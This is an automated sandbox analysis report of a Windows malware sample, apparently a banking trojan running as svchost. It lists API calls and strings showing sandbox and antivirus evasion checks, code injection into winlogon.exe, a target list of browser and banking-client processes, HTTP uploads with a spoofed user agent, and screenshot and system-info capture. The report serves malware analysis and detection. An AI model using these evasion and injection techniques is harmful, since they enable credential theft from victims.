                                                                                                                                                                                                              • Instruction ID: dca5d11db796a4a0b9cc7d8c0307223bdec7dfbcd39a2cfdaed9eb075d7dc651
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 28641a7918a25ec63985f1ee5495eba97b63afb089833f3db4ff431baaa5b6f7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00918E71BC1325B6FB2076B19C8AF6E375C5F04B44F950615BD43F6280EFA4E9808A79

                                                                                                                                                                                                              Control-flow Graph (graph not preserved; first block 2654ab0-2654afd)
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02654AED
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000017,?,?,00000000), ref: 02654B27
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02654B2E
                                                                                                                                                                                                              • memset.MSVCRT ref: 02654B3E
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,00000004,?,?,00000000), ref: 02654B5D
                                                                                                                                                                                                              • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),00000000,00000000,00000000,04000000), ref: 02654BC2
                                                                                                                                                                                                              • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02654BE1
                                                                                                                                                                                                              • HttpOpenRequestA.WININET(00000000,GET,00000000,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02654C19
                                                                                                                                                                                                              • HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 02654C4A
                                                                                                                                                                                                              • HttpAddRequestHeadersA.WININET(00000000,Referer: http://www.google.com,000000FF,20000000), ref: 02654C5E
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02654C7C
                                                                                                                                                                                                              • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,20000000), ref: 02654C94
                                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000004), ref: 02654CAA
                                                                                                                                                                                                              • HttpQueryInfoA.WININET(00000000,20000013,00000000,00000004,00000000), ref: 02654CCD
                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,?,?,00000000), ref: 02654D05
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 02654D2C
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(00000000,?,00000004,00000000,?,?,00000000), ref: 02654D4D
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 02654D66
                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,?,00000000), ref: 02654D70
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00001010,?,?,00000000), ref: 02654D83
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,00000000), ref: 02654D86
                                                                                                                                                                                                              • memset.MSVCRT ref: 02654D9E
                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,00000000,00001000,00000000), ref: 02654DBB
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,?,?,00000000), ref: 02654DDC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 02654DEC
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 02654DFB
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 02654E0B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 02654E14
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02654E1B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 02654E2C
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02654E33
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 02654E41
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02654E44
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 02654E51
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02654E54
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000004,?,?,00000000), ref: 02654E6A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 02654E7B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Content-Type: multipart/form-data; boundary=---------------------------%s, xrefs: 02654C6B
                                                                                                                                                                                                              • HTTP/1.0, xrefs: 02654C11
                                                                                                                                                                                                              • Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02654BBD
                                                                                                                                                                                                              • Referer: http://www.google.com, xrefs: 02654C58
                                                                                                                                                                                                              • Content-Type: application/x-www-form-urlencoded, xrefs: 02654C42
                                                                                                                                                                                                              • GET, xrefs: 02654BF5
                                                                                                                                                                                                              • S:(ML;;NRNWNX;;;LW), xrefs: 02654D27
                                                                                                                                                                                                              • POST, xrefs: 02654BFE, 02654C17
                                                                                                                                                                                                              • 4864fbb3d37ea29, xrefs: 02654C66
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$FileHttpProcess$Request$Security$DescriptorFreeHeadersInternetmemset$HandleInfoOpenValidate$AllocAllocateCloseConnectConvertCreateInformationLocalLockNamedPointerQueryReadSaclSendStringUnlockWrite_snprintfmemcpy
                                                                                                                                                                                                              • String ID: 4864fbb3d37ea29$Content-Type: application/x-www-form-urlencoded$Content-Type: multipart/form-data; boundary=---------------------------%s$GET$HTTP/1.0$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$POST$Referer: http://www.google.com$S:(ML;;NRNWNX;;;LW)

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(user32.dll), ref: 00402D41
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402D55
                                                                                                                                                                                                                • Part of subcall function 00403A20: RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403A60
                                                                                                                                                                                                                • Part of subcall function 00403A20: RegQueryValueExA.KERNEL32(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403A85
                                                                                                                                                                                                                • Part of subcall function 00403A20: RegCloseKey.ADVAPI32(?), ref: 00403A93
                                                                                                                                                                                                                • Part of subcall function 00403A20: GetUserNameA.ADVAPI32(?,00000104), ref: 00403AD9
                                                                                                                                                                                                                • Part of subcall function 00403A20: CharUpperA.USER32(?), ref: 00403AE6
                                                                                                                                                                                                                • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403AFE
                                                                                                                                                                                                                • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403B17
                                                                                                                                                                                                                • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403B30
                                                                                                                                                                                                                • Part of subcall function 00403A20: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403B49
                                                                                                                                                                                                                • Part of subcall function 00403A20: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403B6D
                                                                                                                                                                                                                • Part of subcall function 00403A20: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403BA7
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00402D66
                                                                                                                                                                                                              • FindWindowA.USER32(____AVP.Root,00000000), ref: 00402D7D
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402D89
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,00000466,00010001,00000000), ref: 00402D9B
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 00402DBB
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00402DCC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Namestrstr$ExitFileModuleProcessUser$AdminCharCloseCountDirectoryFindInformationLibraryLoadMessageOpenPostQuerySystemTickUpperValueVolumeWindowWindows
                                                                                                                                                                                                              • String ID: IsWow64Process$PnSw$Wed Jul 6 06:49:26 20112$\apppatch\$____AVP.Root$explorer.exe$kernel32.dll$user32.dll$winlogon.exe

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02643ACA
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004,?), ref: 02643B33
                                                                                                                                                                                                              • SymSetOptions.DBGHELP(00000006), ref: 02643B48
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000001), ref: 02643B58
                                                                                                                                                                                                              • SymInitialize.DBGHELP(00000000), ref: 02643B5B
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000), ref: 02643B9A
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,main,00000000,?), ref: 02643C27
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02643C47
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 02643CD4
                                                                                                                                                                                                              • ZwQueryInformationThread.NTDLL(00000000), ref: 02643CDB
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000), ref: 02643D20
                                                                                                                                                                                                                • Part of subcall function 02665460: VirtualQuery.KERNEL32(02665460,?,0000001C,?,?,?,02643BC8), ref: 02665488
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Self exception = TRUE, xrefs: 02643C8D
                                                                                                                                                                                                              • csm, xrefs: 02643A45
                                                                                                                                                                                                              • DEBUG, xrefs: 0264404D
                                                                                                                                                                                                              • debug_%s_%s.log, xrefs: 02643ED4
                                                                                                                                                                                                              • CallStack:, xrefs: 02643D58
                                                                                                                                                                                                              • ExceptionCode = 0x%08XLast error: 0x%08XContext:Eip = 0x%08X Eax = 0x%08X Ebx = 0x%08XEcx = 0x%08X Edx = 0x%08X Ebp = 0x%08XEsp = 0x%08X Esi = 0x%08X Edi = 0x%08XEFlags = 0x%08XMain module:%s 0x%08X-0x%08X, xrefs: 02643C3E
                                                                                                                                                                                                              • sysinfo.log, xrefs: 02643F78
                                                                                                                                                                                                              • scr.bmp, xrefs: 02643FF8
                                                                                                                                                                                                              • ExceptionAddress = , xrefs: 02643B68
                                                                                                                                                                                                              • main, xrefs: 02643BEE
                                                                                                                                                                                                              • ThreadStart = , xrefs: 02643CF8
                                                                                                                                                                                                              • HH;mm;ss, xrefs: 02643EB2
                                                                                                                                                                                                              • dd;MMM;yyyy, xrefs: 02643E8B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
• Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Current$ProcessQueryVirtual$Thread$AllocErrorInformationInitializeLastOptions_snprintf
                                                                                                                                                                                                              • String ID: CallStack:$ExceptionCode = 0x%08XLast error: 0x%08XContext:Eip = 0x%08X Eax = 0x%08X Ebx = 0x%08XEcx = 0x%08X Edx = 0x%08X Ebp = 0x%08XEsp = 0x%08X Esi = 0x%08X Edi = 0x%08XEFlags = 0x%08XMain module:%s 0x%08X-0x%08X$Self exception = TRUE$ThreadStart = $DEBUG$ExceptionAddress = $HH;mm;ss$csm$dd;MMM;yyyy$debug_%s_%s.log$main$scr.bmp$sysinfo.log

Control-flow Graph

Graph starts at 00403A20 (rendering not reproduced). API calls named in the graph: RegOpenKeyExA, RegQueryValueExA, RegCloseKey, GetUserNameA, CharUpperA, strstr, GetSystemWindowsDirectoryA, GetVolumeInformationA, GetModuleFileNameA, StrStrIA.
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403A60
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403A85
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00403A93
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00403A9F
                                                                                                                                                                                                              • GetUserNameA.ADVAPI32(?,00000104), ref: 00403AD9
                                                                                                                                                                                                              • CharUpperA.USER32(?), ref: 00403AE6
                                                                                                                                                                                                              • strstr.MSVCRT ref: 00403AFE
                                                                                                                                                                                                              • strstr.MSVCRT ref: 00403B17
                                                                                                                                                                                                              • strstr.MSVCRT ref: 00403B30
                                                                                                                                                                                                              • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403B49
                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403B6D
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403BA7
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\sand-box\), ref: 00403BBF
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\cwsandbox\), ref: 00403BD1
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\sandbox\), ref: 00403BE3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: strstr$CloseName$CharDirectoryFileInformationModuleOpenQuerySystemUpperUserValueVolumeWindows
                                                                                                                                                                                                              • String ID: E$HARDWARE\DESCRIPTION\System$M$MALNETVM$Q$SANDBOX$SystemBiosVersion$U$VIRUSCLONE$\cwsandbox\$\sand-box\$\sandbox\

Control-flow Graph

Graph starts at 02659E40 (rendering not reproduced). API calls named in the graph: WSAStartup, socket, htons, bind, listen, gethostname, gethostbyname, accept, getpeername, inet_ntoa, CreateThread, CloseHandle, closesocket, ExitThread.
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
• Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExitThread$Startupsocket
                                                                                                                                                                                                              • String ID: login$pass

Control-flow Graph

Graph starts at 026579D0 (rendering not reproduced). API calls named in the graph: Sleep, OpenProcess, GetProcessTimes, GetHandleInformation, CloseHandle, EnterCriticalSection, LeaveCriticalSection, VirtualQuery, GetProcessHeap, HeapAlloc, HeapValidate, HeapFree.
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 026578A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 026578B4
                                                                                                                                                                                                                • Part of subcall function 026578A0: Process32First.KERNEL32(00000000,?), ref: 026578D9
                                                                                                                                                                                                                • Part of subcall function 026578A0: GetCurrentProcessId.KERNEL32(?,00000000), ref: 026578FD
                                                                                                                                                                                                                • Part of subcall function 026578A0: StrStrIA.SHLWAPI(iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex,?,?,00000000), ref: 02657917
                                                                                                                                                                                                                • Part of subcall function 026578A0: EnterCriticalSection.KERNEL32(0268FB80,?,00000000), ref: 0265793B
                                                                                                                                                                                                                • Part of subcall function 026578A0: GetProcessHeap.KERNEL32(00000008,00000010,?,00000000), ref: 02657941
                                                                                                                                                                                                                • Part of subcall function 026578A0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02657948
                                                                                                                                                                                                                • Part of subcall function 026578A0: LeaveCriticalSection.KERNEL32(0268FB80,?,00000000), ref: 02657977
                                                                                                                                                                                                                • Part of subcall function 026578A0: Process32Next.KERNEL32(00000000,00000128), ref: 0265798B
                                                                                                                                                                                                                • Part of subcall function 026578A0: GetHandleInformation.KERNEL32(00000000,?,?,00000000), ref: 026579A5
                                                                                                                                                                                                                • Part of subcall function 026578A0: CloseHandle.KERNEL32(00000000,?,00000000), ref: 026579B6
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,000002F0), ref: 02657A34
                                                                                                                                                                                                              • GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 02657A58
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02657A82
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02657A94
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0268FB80), ref: 02657A9F
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0268FB80), ref: 02657AC4
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,?), ref: 02657B2B
                                                                                                                                                                                                              • GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 02657B4C
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02657B70
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02657B82
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0268FB80), ref: 02657B8D
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0268FB80), ref: 02657BB8
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(02665460,?,0000001C), ref: 02657C06
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(02665460,?,0000001C), ref: 02657C51
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0268FB80,?,?), ref: 02657C90
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000010), ref: 02657C9A
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02657CA1
                                                                                                                                                                                                              • Sleep.KERNEL32(00000032), ref: 02657DB5
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalProcessSection$Handle$EnterHeap$CloseInformationLeave$OpenProcess32QueryTimesVirtual$AllocAllocateCreateCurrentFirstNextSleepSnapshotToolhelp32
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3323447582-0
                                                                                                                                                                                                              • Opcode ID: d5c16c0e2260ee4f087dd474a1af3fcb73416f0e1f2281571a8c67d3d8cad699
                                                                                                                                                                                                              • Instruction ID: 28ff06edd8f96825c90cb7e34d2dbd3c054e2dd942c01daa720de9d9162f7c4f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d5c16c0e2260ee4f087dd474a1af3fcb73416f0e1f2281571a8c67d3d8cad699
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3DC12BB0948351AFD321CF65C884A6FFBE9FB88B40F548A1EF98A87240D7709545CF92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00401CF0: memset.MSVCRT ref: 00401D16
                                                                                                                                                                                                                • Part of subcall function 00401CF0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,76F90F00,00000000,00000000), ref: 00401D27
                                                                                                                                                                                                                • Part of subcall function 00401CF0: GetLastError.KERNEL32 ref: 00401D30
                                                                                                                                                                                                                • Part of subcall function 00401CF0: SwitchToThread.KERNEL32 ref: 00401D3F
                                                                                                                                                                                                                • Part of subcall function 00401CF0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D48
                                                                                                                                                                                                                • Part of subcall function 00401CF0: GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401D68
                                                                                                                                                                                                                • Part of subcall function 00401CF0: CloseHandle.KERNEL32(00000000), ref: 00401D79
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064,00000000,?,76A8DB30,00402F58,winlogon.exe), ref: 0040169D
                                                                                                                                                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,00000000,00000000,?,76A8DB30,00402F58,winlogon.exe), ref: 004016BC
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004016DB
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004016F1
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000), ref: 004016FD
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401718
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401728
                                                                                                                                                                                                              • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 0040176F
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,00000000,00406400,?,?), ref: 00401791
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 004017BD
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?), ref: 004017D8
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 004017F3
                                                                                                                                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00401801
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,?,00406400,00053200,?), ref: 00401834
                                                                                                                                                                                                              • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 00401844
                                                                                                                                                                                                              • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00401856
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000), ref: 0040186E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040187F
                                                                                                                                                                                                              • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004018A0
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000), ref: 004018BC
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004018CD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$Process$Create$CloseInformationMemoryThreadVirtualWrite$AddressAllocModuleProcSnapshotToolhelp32$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                              • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                              • API String ID: 3542510048-3024904723
                                                                                                                                                                                                              • Opcode ID: b52e5c5ec1b8c5c5d1f56604e8b275c58ea21d2f27abb4c54a5c33d97d0ce9a6
                                                                                                                                                                                                              • Instruction ID: aea8cd550169bae8ca71061e7f9b66115ece3b9acf575b2a14c75ec5d6601f55
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b52e5c5ec1b8c5c5d1f56604e8b275c58ea21d2f27abb4c54a5c33d97d0ce9a6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1071A4B1A00315ABE7109F94DD89FAF77B8EF88701F158039FA01B72D1D7789A458768
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,026645D3,?,0269D2A0,76F8F380), ref: 026476BB
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 026476C2
                                                                                                                                                                                                              • memset.MSVCRT ref: 026476DA
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,026645C4,00000104), ref: 026476E9
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?), ref: 02647711
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocFileFindFirstProcesslstrcpynmemset
                                                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                                                              • API String ID: 2617121151-1173974218
                                                                                                                                                                                                              • Opcode ID: f8902099ab7a0f651fb1668500ce86a38b23c4eff8b4810fd8f05bbc2d7755ca
                                                                                                                                                                                                              • Instruction ID: 06d8acf2fad80ae08dbbc1e974057518dd59342f678c79d1bb3dee25fdc23ccb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f8902099ab7a0f651fb1668500ce86a38b23c4eff8b4810fd8f05bbc2d7755ca
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E610371904346ABC7229F349C98FBBBFADAF46354F494A54F9C287281EF21D409C7A1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02665680: memset.MSVCRT ref: 026656A6
                                                                                                                                                                                                                • Part of subcall function 02665680: CreateToolhelp32Snapshot.KERNEL32(00000008,?,?,00000000,76F90F00), ref: 026656B7
                                                                                                                                                                                                                • Part of subcall function 02665680: GetLastError.KERNEL32 ref: 026656C0
                                                                                                                                                                                                                • Part of subcall function 02665680: SwitchToThread.KERNEL32 ref: 026656CF
                                                                                                                                                                                                                • Part of subcall function 02665680: CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 026656D8
                                                                                                                                                                                                                • Part of subcall function 02665680: GetHandleInformation.KERNEL32(00000000,00000000), ref: 026656F8
                                                                                                                                                                                                                • Part of subcall function 02665680: CloseHandle.KERNEL32(00000000), ref: 02665709
